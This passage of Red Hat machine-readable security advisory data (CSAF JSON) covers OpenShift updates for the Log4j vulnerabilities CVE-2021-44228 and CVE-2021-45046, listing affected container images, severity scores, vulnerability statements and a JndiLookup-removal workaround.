"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T15:09:31+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5108"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5106
Vulnerability from csaf_redhat
Published
2021-12-16 06:12
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: OpenShift Container Platform 4.6.z security update
Notes
Topic
An update is now available for Red Hat OpenShift Container Platform 4.6.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat OpenShift Container Platform 4.6.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5106",
"url": "https://access.redhat.com/errata/RHSA-2021:5106"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5106.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.6.z security update",
"tracking": {
"current_release_date": "2024-12-12T01:17:55+00:00",
"generator": {
"date": "2024-12-12T01:17:55+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5106",
"initial_release_date": "2021-12-16T06:12:27+00:00",
"revision_history": [
{
"date": "2021-12-16T06:12:27+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-16T06:12:27+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:55+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.6",
"product": {
"name": "Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.6::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"product": {
"name": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"product_id": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416?arch=s390x\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator\u0026tag=v4.6.0-202112140939.p0.gd421c69.assembly.art3594"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"product": {
"name": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"product_id": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4/ose-logging-elasticsearch6\u0026tag=v4.6.0-202112132021.p0.g2a13a81.assembly.stream"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"product": {
"name": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"product_id": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator\u0026tag=v4.6.0-202112140939.p0.gd421c69.assembly.art3594"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"product": {
"name": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"product_id": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4/ose-logging-elasticsearch6\u0026tag=v4.6.0-202112132021.p0.g2a13a81.assembly.stream"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"product": {
"name": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"product_id": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator\u0026tag=v4.6.0-202112140939.p0.gd421c69.assembly.art3594"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"product": {
"name": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"product_id": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-elasticsearch-operator-bundle\u0026tag=v4.6.0.202112140939.p0.gd421c69.assembly.art3594-1"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64",
"product": {
"name": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64",
"product_id": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hive\u0026tag=v4.6.0-202112140546.p0.g8b9da97.assembly.stream"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"product": {
"name": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"product_id": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-logging-elasticsearch6\u0026tag=v4.6.0-202112132021.p0.g2a13a81.assembly.stream"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"product_id": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.6.0-202112140831.p0.gd74112d.assembly.art3594"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.6.0.202112140831.p0.gd74112d.assembly.art3594-1"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64"
},
"product_reference": "openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64"
},
"product_reference": "openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x"
},
"product_reference": "openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le"
},
"product_reference": "openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x"
},
"product_reference": "openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64"
},
"product_reference": "openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le"
},
"product_reference": "openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
},
"product_reference": "openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
